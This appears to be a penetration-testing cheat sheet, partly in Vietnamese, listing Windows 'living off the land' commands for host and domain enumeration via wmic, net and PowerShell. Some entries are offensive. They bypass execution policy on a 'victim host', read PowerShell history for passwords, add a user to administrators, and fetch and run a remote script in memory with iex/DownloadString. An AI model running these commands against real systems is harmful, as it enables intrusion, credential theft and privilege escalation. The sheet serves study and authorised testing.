Living Off the Land

Command

Result

hostname

Prints the PC's Name

[System.Environment]::OSVersion.Version

Prints out the OS version and revision level

wmic qfe get Caption,Description,HotFixID,InstalledOn

Prints the patches and hotfixes applied to the host

ipconfig /all

Prints out network adapter state and configurations

set

Displays a list of environment variables for the current session (ran from CMD-prompt)

echo %USERDOMAIN%

Displays the domain name to which the host belongs (ran from CMD-prompt)

echo %logonserver%

Prints out the name of the Domain controller the host checks in with (ran from CMD-prompt)

Cmd-Let

Description

Get-Module

Lists available modules loaded for use.

Get-ExecutionPolicy -List

Will print the execution policy settings for each scope on a host.

Set-ExecutionPolicy Bypass -Scope Process

This will change the policy for our current process using the -Scope parameter. Doing so will revert the policy once we vacate the process or terminate it. This is ideal because we won't be making a permanent change to the victim host.

Get-ChildItem Env: | ft Key,Value

Return environment values such as key paths, users, computer information, etc.

Get-Content $env:APPDATA\Microsoft\Windows\Powershell\PSReadline\ConsoleHost_history.txt

With this string, we can get the specified user's PowerShell history. This can be quite helpful as the command history may contain passwords or point us towards configuration files or scripts that contain passwords.

powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('URL to download the file from'); <follow-on commands>"

This is a quick and easy way to download a file from the web using PowerShell and call it from memory.

Command

Description

wmic qfe get Caption,Description,HotFixID,InstalledOn

In ra các bản patched và mô tả của các hotfix

wmic computersystem get Name,Domain,Manufacturer,Model,Username,Roles /format:List

Hiển thị các thông tin về máy cơ bản.

wmic process list /format:list

In ra tất cả process trên máy

wmic ntdomain list /format:list

Hiển thị các thông tin về domain và domain controller

wmic useraccount list /format:list

Hiển thị tất cả các local accounts và các domain accounts đã logged vào thiết bị

wmic group list /format:list

Hiển thị thông tin về tất cả local groups

wmic sysaccount list /format:list

Dumps thông tin về bất kì system accounts nào đang sử dụng làm service accounts.

Command

Description

net accounts

Information about password requirements

net accounts /domain

Password and lockout policy

net group /domain

Information about domain groups

net group "Domain Admins" /domain

List users with domain admin privileges

net group "domain computers" /domain

List of PCs connected to the domain

net group "Domain Controllers" /domain

List PC accounts of domains controllers

net group <domain_group_name> /domain

User that belongs to the group

net groups /domain

List of domain groups

net localgroup

All available groups

net localgroup administrators /domain

List users that belong to the administrators group inside the domain (the group Domain Admins is included here by default)

net localgroup Administrators

Information about a group (admins)

net localgroup administrators [username] /add

Add user to administrators

net share

Check current shares

net user <ACCOUNT_NAME> /domain

Get information about a user within the domain

net user /domain

List all users of the domain

net user %username%

Information about the current user

net use x: \computer\share

Mount the share locally

net view

Get a list of computers

net view /all /domain[:domainname]

Shares on the domains

net view \computer /ALL

List shares of a computer

net view /domain

List of PCs of the domain